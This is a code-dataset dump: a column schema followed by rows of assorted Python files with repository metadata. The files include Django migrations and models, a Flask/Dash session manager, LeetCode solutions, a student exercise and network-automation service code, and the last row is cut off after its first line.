| Column | Type | Min | Max |
|---|---|---|---|
| blob_id | string length | 40 | 40 |
| directory_id | string length | 40 | 40 |
| path | string length | 3 | 616 |
| content_id | string length | 40 | 40 |
| detected_licenses | sequence length | 0 | 112 |
| license_type | string, 2 classes | | |
| repo_name | string length | 5 | 115 |
| snapshot_id | string length | 40 | 40 |
| revision_id | string length | 40 | 40 |
| branch_name | string, 777 classes | | |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 | 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 | 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 | 2023-09-06 01:08:06 |
| github_id | int64, nullable | 4.92k | 681M |
| star_events_count | int64 | 0 | 209k |
| fork_events_count | int64 | 0 | 110k |
| gha_license_id | string, 22 classes | | |
| gha_event_created_at | timestamp[us], nullable | 2012-06-04 01:52:49 | 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us], nullable | 2008-05-22 07:58:19 | 2023-08-21 12:35:19 |
| gha_language | string, 149 classes | | |
| src_encoding | string, 26 classes | | |
| language | string, 1 class | | |
| is_vendor | bool, 2 classes | | |
| is_generated | bool, 2 classes | | |
| length_bytes | int64 | 3 | 10.2M |
| extension | string, 188 classes | | |
| content | string length | 3 | 10.2M |
| authors | sequence length | 1 | 1 |
| author_id | string length | 1 | 132 |
0eea1f221c0a6316a2eed2457dffd111f15c8a0b | 16e69196886254bc0fe9d8dc919ebcfa844f326a | /edc/core/bhp_content_type_map/migrations/0005_update_module_name.py | 67a886c53b822966a1fc216991741f16ccb05bd3 | [] | no_license | botswana-harvard/edc | b54edc305e7f4f6b193b4498c59080a902a6aeee | 4f75336ff572babd39d431185677a65bece9e524 | refs/heads/master | 2021-01-23T19:15:08.070350 | 2015-12-07T09:36:41 | 2015-12-07T09:36:41 | 35,820,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,009 | py |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
# Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..."
ContentTypeMap = orm['bhp_content_type_map.ContentTypeMap']
for obj in ContentTypeMap.objects.all():
obj.module_name = obj.model
obj.save()
print (obj.app_label, obj.module_name)
def backwards(self, orm):
"Write your backwards methods here."
pass
models = {
'bhp_content_type_map.contenttypemap': {
'Meta': {'ordering': "['name']", 'unique_together': "(['app_label', 'model'],)", 'object_name': 'ContentTypeMap'},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'hostname_created': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
'hostname_modified': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'module_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'user_created': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'}),
'user_modified': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['bhp_content_type_map']
symmetrical = True
| [
"[email protected]"
] | |
d7bdeb211ad293ec25a6cd5c0651169bf707cf41 | efb01c5a5f00e918780009d8e870c080ece8cdc5 | /tcapy/vis/sessionmanager.py | 2aaa853615f7ca3d9776036187eb762a0a27eca4 | [
"Apache-2.0"
] | permissive | PontusHultkrantz/tcapy | 0525af2b260377a3a5479112a5a8991efc581e7d | 3699c70031c95943f70a732849a1a6dac26760e9 | refs/heads/master | 2022-10-05T15:00:41.192500 | 2020-06-05T18:25:44 | 2020-06-05T18:25:44 | 269,728,925 | 0 | 0 | Apache-2.0 | 2020-06-05T18:00:02 | 2020-06-05T18:00:01 | null | UTF-8 | Python | false | false | 12,191 | py |
from __future__ import print_function
__author__ = 'saeedamen' # Saeed Amen / [email protected]
#
# Copyright 2018 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import uuid
from flask import session
from dash.dependencies import Output, Input, State
from tcapy.conf.constants import Constants
from tcapy.util.utilfunc import UtilFunc
constants = Constants()
class CallbackManager(object):
"""This class creates the appropriate Input and Output objects to wrap around dash components. It abstracts away
some of the complexity of dash, by allowing the user simplify to specify the string of the dash component.
It will then work out the dash type from the component name. Users need to be careful to name the dash components
with the correct names. For examples, all plots, must have 'plot' within their name.
"""
def input_callback(self, page, input):
"""Create input callbacks for Dash components, which can be used to trigger callbacks. We can have multiple
input callbacks for methods.
Parameters
----------
page : str
Name of the page (eg. 'detailed')
input : str (list)
Dash components where we wish to add dash based input callbacks
Returns
-------
dash.dependencies.Input (list)
"""
if not (isinstance(input, list)):
input = [input]
input_list = [Input(page + '-' + i.split(':')[0], self._find_type(i)) for i in input]
return input_list
def output_callback(self, page, output):
"""Create a output callback for a Dash component, which can be used to trigger callbacks. Note, that we can
only have a single output callback for each method.
Parameters
----------
page : str
Name of the page (eg. 'detailed')
output : str
Dash component where we wish to add dash based output callbacks
Returns
-------
dash.dependencies.Output (list)
"""
return Output(page + '-' + output.split(':')[0], self._find_type(output))
def state_callback(self, page, state):
"""Create state callbacks for Dash components, which can be used to trigger callbacks. We can have multiple
state callbacks for methods.
Parameters
----------
page : str
Name of the page (eg. 'detailed')
state : str (list)
Dash components where we wish to add dash based state callbacks
Returns
-------
dash.dependencies.State (list)
"""
if not (isinstance(state, list)):
            state = [state]
state_list = [State(page + '-' + s.split(':')[0], self._find_type(s)) for s in state]
return state_list
def _find_type(self, tag):
"""Returns the dash type for a dash component.
Parameters
----------
tag : str
Tag for a Dash component
Returns
-------
str
"""
if ":" in tag:
return tag.split(":")[1]
# datepicker
if 'dtpicker' in tag:
return 'date'
# HTML links
if 'link' in tag:
return 'href'
# table like objects
if 'table' in tag:
if constants.gui_table_type == 'dash':
return 'data'
return 'children'
# labels
if 'status' in tag:
return 'children'
# plotly objects
if 'plot' in tag and 'val' not in tag:
return 'figure'
# drop down values
if 'val' in tag:
return 'value'
# HTML ordinary buttons
if 'button' in tag:
return 'n_clicks'
# HTML upload buttons
if 'upbutt' in tag:
return 'contents'
if 'uploadbox' in tag:
return 'contents'
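# ---------------------------------------------------------------------------
# Editor's sketch (not part of the original module): illustrates the naming
# conventions documented above. The page name 'detailed' and the component
# names 'status', 'run-button' and 'ticker:value' are hypothetical examples.
def _callback_manager_demo():  # pragma: no cover
    cm = CallbackManager()
    out = cm.output_callback('detailed', 'status')  # Output('detailed-status', 'children')
    ins = cm.input_callback('detailed', ['run-button',     # Input('detailed-run-button', 'n_clicks')
                                         'ticker:value'])  # Input('detailed-ticker', 'value')
    return out, ins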
import base64
import flask
class SessionManager(object):
"""Manages the caching of properties for a user's session. We use this extensively, to identify users and also to
store variables relating to users on the server side.
It is used for example, for keeping track of which lines have plotted, user's zoom actions, whether tcapy has already
plotted a particular dataset etc.
"""
def __init__(self):
self._util_func = UtilFunc()
# session ID management functions
def get_session_id(self):
"""Gets the current user's session ID and generates a unique one if necessary.
Returns
-------
str
"""
if 'id' not in session:
id = str(uuid.uuid4())
username = self.get_username()
if username is not None:
username = '_' + username
else:
username = ''
session['id'] = id + username
else:
id = session['id']
if not isinstance(id, str):
id = id.decode("utf-8")
return id
def get_username(self):
header = flask.request.headers.get('Authorization', None)
if not header:
return None
username_password = base64.b64decode(header.split('Basic ')[1])
username_password_utf8 = username_password.decode('utf-8')
username, password = username_password_utf8.split(':')
return username
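    # Editor's illustration (hypothetical header): for
    # "Authorization: Basic dXNlcjpwYXNz", base64.b64decode('dXNlcjpwYXNz')
    # yields b'user:pass', so get_username() returns 'user'.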
def set_session_flag(self, tag, value=None):
"""Sets a value with a specific tag in the session dictionary, which is essentially unique for every user.
Parameters
----------
tag : str (dict)
The "hash key" for our variable
value : str
What to set the value in our hash table
Returns
-------
"""
if isinstance(tag, str):
tag = [tag]
if isinstance(tag, dict):
for t in tag:
self.set_session_flag(t, value=tag[t])
return
tag = self._util_func.flatten_list_of_lists(tag)
for t in tag:
session[t] = value
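    # Editor's illustration (hypothetical tags): set_session_flag('plotted', True)
    # stores a single flag, while set_session_flag({'a': 1, 'b': 2}) stores each
    # key with its own value.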
def get_session_flag(self, tag):
"""Gets the value of a tag in the user's session
Parameters
----------
tag : str
Tag to be fetched
Returns
-------
str
"""
if tag in session:
if isinstance(session[tag], bool):
return session[tag]
return str(session[tag])
return None
##### these methods are for keeping track of which lines, user zooms have been plotted for each chart in the user's
##### session object
def check_lines_plotted(self, lines_to_plot, tag):
"""Checks if the lines have been plotted for a particular user, by checking the plot's tag in their user session
Parameters
----------
lines_to_plot : str (list)
Lines to be plotted
tag : str
Tag of plotted lines
Returns
-------
bool
"""
if tag in session:
lines_plotted = session[tag]
if set(lines_to_plot) == set(lines_plotted):
return True
return False
def check_relayoutData_plotted(self, relayoutData, tag):
"""Checks if the relayout data (ie. related to user's clicks, such as when they zoom in) has already been plotted.
Parameters
----------
relayoutData : dict
tag : str
Tag referring to a particular plot
Returns
-------
"""
if tag in session:
# relayoutDataSet = None
# sessionTagSet = None
#
# if relayoutData is not None:
# relayoutDataSet = set(relayoutData)
#
# if session[tag] is not None:
# sessionTagSet = set(session[tag])
# if relayoutData is None:
# return False
if relayoutData == session[tag]:
return True
return False
def set_lines_plotted(self, lines_to_plot, tag):
"""Sets the lines plotted for a particular chart tag in the user's session
Parameters
----------
lines_to_plot : str (list)
Lines plotted
tag : str
Tag of the plot
Returns
-------
"""
session[tag] = lines_to_plot
def set_relayoutData_plotted(self, relayoutData, tag):
"""Sets the user's clicks (typically for zooming into charts) for a particular chart
Parameters
----------
relayoutData : dict
Details a user's click on the chart
tag : str
Tag referring to the plot
Returns
-------
"""
session[tag] = relayoutData
def set_username(self, username):
session['username'] = username
##### We identify when a user has "clicked" a button by change in the number of clicks (Dash documentation recommends
##### this to handle user clicks)
def get_session_clicks(self, tag):
"""Gets the number of clicks for the tag. If doesn't exist, we automatically set the tag as 0.
Parameters
----------
tag : str
The tag for which we want to return the number of clicks
Returns
-------
Number of clicks by current user
"""
if tag not in session:
return 0
return session[tag]
def set_session_clicks(self, tag, n_clicks, old_clicks=None):
"""Sets the number of clicks in the current user's session
Parameters
----------
tag : str
Tag to store the user's clicks under
n_clicks : int
Number of clicks to set
Returns
-------
"""
if old_clicks is None:
session[tag] = n_clicks
elif old_clicks > n_clicks:
session[tag] = n_clicks
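    # Editor's sketch of the click-detection pattern described above (assumed
    # usage, not from the original source):
    #     if n_clicks is not None and n_clicks > sm.get_session_clicks(tag):
    #         sm.set_session_clicks(tag, n_clicks)
    #         ...handle the newly detected click...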
def check_session_tag(self, tag):
"""Checks if a tag exists in the user's session, and if so returns the value of that tag in the user's session
Parameters
----------
tag : str
Tag to check
Returns
-------
str or bool
"""
if tag in session:
return session[tag]
return False
def exists_session_tag(self, tag):
"""Does a tag exist in the current user session?
Parameters
----------
tag : str
Returns
-------
bool
"""
return tag in session
def check_session_reset_tag(self, tag):
"""Checks if a tag is in session (if that tag exists already and is "True", then we reset it to "False"), otherwise
return "False"
Parameters
----------
tag : str
Tags to check
Returns
-------
bool
"""
if tag in session:
old_tag = session[tag]
if old_tag:
session[tag] = False
return True
return False
return False
def create_calculated_flags(self, prefix, lst=None, lst2=None):
"""Creates a list for a combination of prefix and list elements.
Parameters
----------
prefix : str
Prefix (typically a page name like 'detailed')
lst : str (list)
Tags will contain these
lst2 : str (list)
Tags will contain these
Returns
-------
str (list)
"""
if isinstance(prefix, list):
prefix = self._util_func.flatten_list_of_lists(prefix)
lst = [x + '-' + lst for x in prefix]
elif isinstance(lst, list):
lst = self._util_func.flatten_list_of_lists(lst)
lst = [prefix + '-' + x for x in lst]
if lst2 is None:
return lst
lst3 = []
for i in lst2:
for j in lst:
lst3.append(j + '-' + i)
        return lst3
| [
"[email protected]"
] | |
4404bba47db646d9416036a3aa8e535334e7902f | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4060/codes/1684_1100.py | 47661cdbda903bedb36e8d7ab2f89e70b5985e55 | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py |
# Test your code incrementally.
# Don't test everything only at the end, as that makes errors harder to identify.
# When testing your solution, don't limit yourself to the example case.
a=int(input("Entrada: "))
print("Entrada:",a)
if((a!=2)and(a!=5)and(a!=10)and(a!=20)and(a!=50)and(a!=100)):
print("Animal: Invalido")
elif(a==2):
print("Animal: Tartarura")
elif(a==5):
print("Animal: Garca")
elif(a==10):
print("Animal: Arara")
elif(a==20):
print("Animal: Mico-leao-dourado")
elif(a==50):
print("Animal: Onca-pintada")
else:
print("Animal: Garoupa") | [
"[email protected]"
] | |
fc1fa4990f3eb7c426991f2e920afe5ac67e8b2a | 150d9e4cee92be00251625b7f9ff231cc8306e9f | /ReverseWordsIII.py | 35bceae2ed4be0c631984cf4c703decb182946b7 | [] | no_license | JerinPaulS/Python-Programs | 0d3724ce277794be597104d9e8f8becb67282cb0 | d0778178d89d39a93ddb9b95ca18706554eb7655 | refs/heads/master | 2022-05-12T02:18:12.599648 | 2022-04-20T18:02:15 | 2022-04-20T18:02:15 | 216,547,245 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,277 | py |
'''
557. Reverse Words in a String III
Given a string s, reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order.
Example 1:
Input: s = "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Example 2:
Input: s = "God Ding"
Output: "doG gniD"
Constraints:
1 <= s.length <= 5 * 10^4
s contains printable ASCII characters.
s does not contain any leading or trailing spaces.
There is at least one word in s.
All the words in s are separated by a single space.
'''
class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
word_list = s.split()
word_list_list = []
result = ""
for word in word_list:
temp = list(word)
word_list_list.append(temp)
for word in word_list_list:
start = 0
end = len(word) - 1
while start <= end:
temp = word[start]
word[start] = word[end]
word[end] = temp
start = start + 1
end = end - 1
for word in word_list_list:
result = result + ''.join(word) + " "
return result[:-1]
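# Editor's aside (not in the original solution): because the constraints
# guarantee single-space separators, an equivalent idiomatic one-liner is
#     " ".join(w[::-1] for w in s.split(" "))
assert Solution().reverseWords("God Ding") == "doG gniD"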
obj = Solution()
print(obj.reverseWords("Let's take LeetCode contest"))
| [
"[email protected]"
] | |
87dc46c97d4047d73908836fa9cea55aafcbdcd3 | 24fac945c7825c502f9fb2e6df06db26b80b5676 | /blogdjangogirls/urls.py | 230fe7f82e3aea6d486403578d1fc5bd5bdbd700 | [] | no_license | mario220696/my-first-blog | 8f0a9883c4ecde58a8c3483e5ad0823b81a4db7c | 72ec03a579965c984a770f0c4cca0a3eca28aa46 | refs/heads/master | 2020-03-17T11:48:03.954834 | 2018-05-15T19:28:36 | 2018-05-15T19:28:36 | 133,564,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py |
"""blogdjangogirls URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
5972e9b3b763273f9a652d66f3d080b66c693961 | 6dedbcff0af848aa979574426ad9fa3936be5c4a | /cengal/parallel_execution/coroutines/coro_standard_services/remote_nodes/versions/v_0/request_class_info.py | fb2ff414d2289c06f43f46ac97d35a61e59d0cfe | [
"Apache-2.0"
] | permissive | FI-Mihej/Cengal | 558d13541865e22006431bd1a1410ad57261484a | d36c05f4c90dfdac7296e87cf682df2f4d367e4b | refs/heads/master | 2023-06-08T00:39:39.414352 | 2023-06-05T21:35:50 | 2023-06-05T21:35:50 | 68,829,562 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,043 | py |
#!/usr/bin/env python
# coding=utf-8
# Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module Docstring
Docstrings: http://www.python.org/dev/peps/pep-0257/
"""
__author__ = "ButenkoMS <[email protected]>"
__copyright__ = "Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>"
__credits__ = ["ButenkoMS <[email protected]>", ]
__license__ = "Apache License, Version 2.0"
__version__ = "3.2.6"
__maintainer__ = "ButenkoMS <[email protected]>"
__email__ = "[email protected]"
# __status__ = "Prototype"
__status__ = "Development"
# __status__ = "Production"
from enum import Enum
from cengal.parallel_execution.coroutines.coro_scheduler import *
from cengal.parallel_execution.coroutines.coro_tools.await_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.asyncio_loop import *
from cengal.parallel_execution.coroutines.coro_standard_services.loop_yield import CoroPriority
from cengal.parallel_execution.coroutines.coro_standard_services.put_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.timer_func_runner import *
from cengal.file_system.file_manager import path_relative_to_current_dir
from cengal.time_management.load_best_timer import perf_counter
from cengal.data_manipulation.serialization import *
from typing import Hashable, Tuple, List, Any, Dict, Callable, Type
from cengal.introspection.inspect import get_exception, entity_owning_module_importable_str, entity_owning_module_info_and_owning_path, entity_properties
from cengal.io.core.memory_management import IOCoreMemoryManagement
from cengal.parallel_execution.asyncio.efficient_streams import StreamManagerIOCoreMemoryManagement, TcpStreamManager, UdpStreamManager, StreamManagerAbstract
from cengal.code_flow_control.smart_values import ValueExistence
from cengal.io.named_connections.named_connections_manager import NamedConnectionsManager
from cengal.code_flow_control.args_manager import number_of_provided_args
from cengal.data_manipulation.serialization import Serializer, Serializers, best_serializer
from cengal.code_flow_control.args_manager import find_arg_position_and_value, UnknownArgumentError
from cengal.data_generation.id_generator import IDGenerator, GeneratorType
from cengal.system import PLATFORM_NAME, PYTHON_VERSION
from importlib import import_module
import sys
import os
import asyncio
import lmdb
from .exceptions import *
from .commands import *
from .class_info import *
class LocalRequestClassInfo(LocalClassInfo):
def __init__(self, local_id: Hashable, request: Request) -> None:
super().__init__(local_id, type(request))
self._properties: Dict[str, Hashable] = {property_name: index for index, property_name in enumerate(entity_properties(request))} # key: property name; value: property id
self._properties_tuple: Tuple[Tuple[str, Hashable]] = tuple(self._properties.items())
def __call__(self) -> Type:
return {
CommandDataFieldsDeclareServiceRequestClass.local_id.value: self._local_id,
CommandDataFieldsDeclareServiceRequestClass.class_name.value: self._class_name,
CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value: self._module_importable_str,
CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value: self._properties_tuple,
}
@property
def properties(self):
return self._properties
@property
def properties_tuple(self):
return self._properties_tuple
def request_to_data(self, request: Request) -> Dict:
return {
CommandDataFieldsServiceRequestWithRequestClass.request_class_id.value: self._local_id,
CommandDataFieldsServiceRequestWithRequestClass.properties_tuple.value: tuple(((property_id, getattr(request, property_name)) for property_name, property_id in self._properties_tuple)),
}
class RemoteRequestClassInfo(RemoteClassInfo):
def __init__(self, local_id: Hashable, class_name: str, module_importable_str: str, properties_tuple: Tuple[Tuple[str, Hashable]]) -> None:
super().__init__(local_id, class_name, module_importable_str)
self._properties_tuple: Tuple[Tuple[str, Hashable]] = properties_tuple
self._properties: Dict[Hashable, str] = {index: property_name for property_name, index in properties_tuple} # key: property id; value: property name
@classmethod
def from_data(cls, data: Dict[Hashable, Any]) -> 'RemoteRequestClassInfo':
local_id: Hashable = data[CommandDataFieldsDeclareServiceRequestClass.local_id.value]
class_name: str = data[CommandDataFieldsDeclareServiceRequestClass.class_name.value]
module_importable_str: str = data[CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value]
properties_tuple: Tuple[Tuple[str, Hashable]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
return cls(local_id, class_name, module_importable_str, properties_tuple)
def __call__(self, data: Dict) -> Request:
request: Request = self.class_type()
properties_tuple: Tuple[Tuple[Hashable, Any]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
for index, value in properties_tuple:
name: str = self._properties[index]
setattr(request, name, value)
return request
| [
"[email protected]"
] | |
c7be3da8472cb8def0f76e0cac71b79a7063ba14 | c829275111b9025dcccc9ac1b92d8dc51adbb71d | /photo/urls.py | 4fec7ab88e9eb5f629a088b997138a2b641ed5cb | [
"MIT"
] | permissive | Ken-mbira/PHOTO_BOOK | f1bd1bd65af228b0600bf69da12840897eb109ad | d47cd8dabd4b92e3befdafe2d99db266be31ffff | refs/heads/master | 2023-08-19T06:55:07.309342 | 2021-10-12T11:05:00 | 2021-10-12T11:05:00 | 414,297,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 521 | py |
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
urlpatterns = [
path('',views.index,name = 'home'),
path('images/',views.images,name = 'images'),
path('images/<int:pk>',views.image_spec,name = 'image'),
path('category/<int:pk>',views.image_category,name = 'category'),
path('search',views.search_images, name="search")
]
if settings.DEBUG:
    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
20cf30291dd3e1ce42e9eac92e98cb83666fbc14 | 303bac96502e5b1666c05afd6c2e85cf33f19d8c | /solutions/python3/946.py | 08e5a7f4e305aa8dfddd5a773566d9bdd70744e5 | [
"MIT"
] | permissive | jxhangithub/leetcode | 5e82f4aeee1bf201e93e889e5c4ded2fcda90437 | 0de1af607557d95856f0e4c2a12a56c8c57d731d | refs/heads/master | 2022-05-22T12:57:54.251281 | 2022-03-09T22:36:20 | 2022-03-09T22:36:20 | 370,508,127 | 1 | 0 | MIT | 2022-03-09T22:36:20 | 2021-05-24T23:16:10 | null | UTF-8 | Python | false | false | 392 | py |
class Solution:
def validateStackSequences(self, pushed, popped):
"""
:type pushed: List[int]
:type popped: List[int]
:rtype: bool
"""
arr, i = [], 0
for num in pushed:
arr.append(num)
while arr and arr[-1] == popped[i]:
i += 1
arr.pop()
        return arr == popped[i:][::-1]
| [
"[email protected]"
] | |
f2a2c09d102ebb4c12b5678990d4b07e6fa71280 | 16eaa90eec58137c7cf0e429e574499d00ee21f2 | /apps/manga/models/manga.py | 325ffa9c350f2a247de6aad14b844a1d38c33887 | [
"MIT"
] | permissive | eliezer-borde-globant/lemanga | 53c48f91f5df4671c1653ab927acab3c95097468 | 57c799804754f6a91fd214faac84d9cd017fc0c4 | refs/heads/master | 2023-02-16T23:25:49.889702 | 2020-12-28T17:27:49 | 2020-12-28T17:27:49 | 322,420,102 | 0 | 0 | MIT | 2020-12-17T23:10:32 | 2020-12-17T21:43:56 | null | UTF-8 | Python | false | false | 748 | py |
from __future__ import unicode_literals
import uuid
from django.core.urlresolvers import reverse_lazy
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from autoslug import AutoSlugField
@python_2_unicode_compatible
class Manga(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=200, unique=True)
slug = AutoSlugField(populate_from='name', unique=True, always_update=True)
class Meta:
verbose_name = "Manga"
verbose_name_plural = "Mangas"
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse_lazy('detail-manga', kwargs={"name": self.slug})
| [
"[email protected]"
] | |
528f4f027317f1d22c63b7a145d3182c87daa77f | 86fc644c327a8d6ea66fd045d94c7733c22df48c | /scripts/managed_cpe_services/customer/single_cpe_dual_wan_site/single_cpe_dual_wan_site_services/cpe_primary_wan/end_points/bgp_peers/service_customization.py | 7e389e7294aa0bde9644faa5fec5bf5a73b91948 | [] | no_license | lucabrasi83/anutacpedeployment | bfe703657fbcf0375c92bcbe7560051817f1a526 | 96de3a4fd4adbbc0d443620f0c53f397823a1cad | refs/heads/master | 2021-09-24T16:44:05.305313 | 2018-10-12T02:41:18 | 2018-10-12T02:41:18 | 95,190,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,162 | py |
#
# This computer program is the confidential information and proprietary trade
# secret of Anuta Networks, Inc. Possessions and use of this program must
# conform strictly to the license agreement between the user and
# Anuta Networks, Inc., and receipt or possession does not convey any rights
# to divulge, reproduce, or allow others to use this program without specific
# written authorization of Anuta Networks, Inc.
#
# Copyright (c) 2015-2016 Anuta Networks, Inc. All Rights Reserved.
#
#
#ALL THE CUSTOMIZATIONS REGARDING DATAPROCESSING SHOULD BE WRITTEN INTO THIS FILE
#
"""
Tree Structure of Handled XPATH:
services
|
managed-cpe-services
|
customer
|
single-cpe-dual-wan-site
|
single-cpe-dual-wan-site-services
|
cpe-primary-wan
|
end-points
|
bgp-peers
Schema Representation:
/services/managed-cpe-services/customer/single-cpe-dual-wan-site/single-cpe-dual-wan-site-services/cpe-primary-wan/end-points/bgp-peers
"""
"""
Names of Leafs for this Yang Entity
BGP-peer-name
peer-ip
peer-description
remote-as
password
import-route-map
export-route-map
next-hop-self
soft-reconfiguration
default-originate
default-originate-route-map
send-community
encrypted-password
advertisement-interval
time-in-sec
timers
keepalive-interval
holdtime
"""
from servicemodel import util
from servicemodel import yang
from servicemodel import devicemgr
from cpedeployment.cpedeployment_lib import getLocalObject
from cpedeployment.cpedeployment_lib import getDeviceObject
from cpedeployment.cpedeployment_lib import getCurrentObjectConfig
from cpedeployment.cpedeployment_lib import ServiceModelContext
from cpedeployment.cpedeployment_lib import getParentObject
from cpedeployment.cpedeployment_lib import log
from cpedeployment.bgppeer_lib import bgp_peer
from cpedeployment.bgppeer_lib import update_bgp_peer
class ServiceDataCustomization:
@staticmethod
def process_service_create_data(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the inputs"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
@staticmethod
def process_service_device_bindings(smodelctx, sdata, dev, **kwargs):
""" Custom API to modify the device bindings or Call the Business Login Handlers"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
if modify:
config = kwargs['config']
inputdict = kwargs['inputdict']
devbindobjs = kwargs['devbindobjs']
for device in util.convert_to_list(dev):
bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)
@staticmethod
def process_service_update_data(smodelctx, sdata, **kwargs):
"""callback called for update operation"""
modify = True
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
dev = kwargs['dev']
for device in util.convert_to_list(dev):
update_bgp_peer('cpe_dual', 'cpe_primary_dual', smodelctx, sdata, device, **kwargs)
@staticmethod
def process_service_delete_data(smodelctx, sdata, **kwargs):
"""callback called for delete operation"""
modify = False
if modify and kwargs is not None:
for key, value in kwargs.iteritems():
log("%s == %s" %(key,value))
class DeletePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for Deletion"""
log('operations: %s' % (operations))
class CreatePreProcessor(yang.SessionPreProcessor):
def processBeforeReserve(self, session):
operations = session.getOperations()
"""Add any move operations for creation"""
log('operations: %s' % (operations))
| [
"[email protected]"
] | |
33342edc351835d96fc30b2229c64f36d1195aa5 | 0e25538b2f24f1bc002b19a61391017c17667d3d | /storefront/win_sfstore.py | 182c135f774ac6bf02adb5b401eac608aa296006 | [] | no_license | trondhindenes/Ansible-Auto-Generated-Modules | 725fae6ba9b0eef00c9fdc21179e2500dfd6725f | efa6ac8cd2b545116f24c1929936eb8cc5c8d337 | refs/heads/master | 2020-04-06T09:21:00.756651 | 2016-10-07T07:08:29 | 2016-10-07T07:08:29 | 36,883,816 | 12 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,533 | py | #!/usr/bin/python
